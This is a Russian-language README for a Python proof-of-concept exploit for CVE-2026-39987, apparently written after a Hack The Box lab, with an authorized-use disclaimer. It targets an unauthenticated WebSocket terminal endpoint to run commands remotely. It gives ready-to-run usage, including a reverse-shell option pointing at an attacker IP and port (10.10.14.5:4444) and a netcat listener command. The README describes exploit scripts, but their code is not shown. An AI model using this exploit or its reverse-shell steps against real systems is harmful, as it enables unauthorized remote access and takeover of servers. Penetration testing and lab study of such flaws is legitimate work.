
Python proof-of-concept для CVE-2026-39987, эксплуатирующий неаутентифицированную конечную точку терминала WebSocket для удалённого выполнения команд и получения обратной оболочки.
Proof of Concept для CVE-2026-39987, демонстрирующий удалённое выполнение команд через уязвимую конечную точку терминала WebSocket.
Отказ от ответственности: Данный PoC предназначен исключительно для авторизованного тестирования безопасности и образовательных целей. Используйте его только против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
Уязвимость позволяет неаутентифицированному пользователю взаимодействовать с конечной точкой терминала WebSocket приложения и удалённо выполнять команды.
PoC подключается к:
wss://<target>/terminal/ws
и демонстрирует выполнение команд через WebSocket-соединение.
Целью, использовавшейся при разработке/тестировании данного PoC, была авторизованная лабораторная среда Hack The Box.
websocket-clientУстановите необходимую библиотеку:
pip3 install websocket-client
python3 test.py <domain>
Пример:
python3 test.py somesite.com
PoC устанавливает WebSocket-соединение и выполняет тестовую команду.
PoC также поддерживает опцию обратного шелла:
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>
Пример:
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444
Запустите слушатель перед выполнением PoC:
nc -lvnp 4444
Приложение предоставляет конечную точку терминала WebSocket без требования аутентификации.
PoC:
Первоначальный вызов ws.recv() важен, поскольку сервер отправляет приглашение оболочки сразу после установления соединения.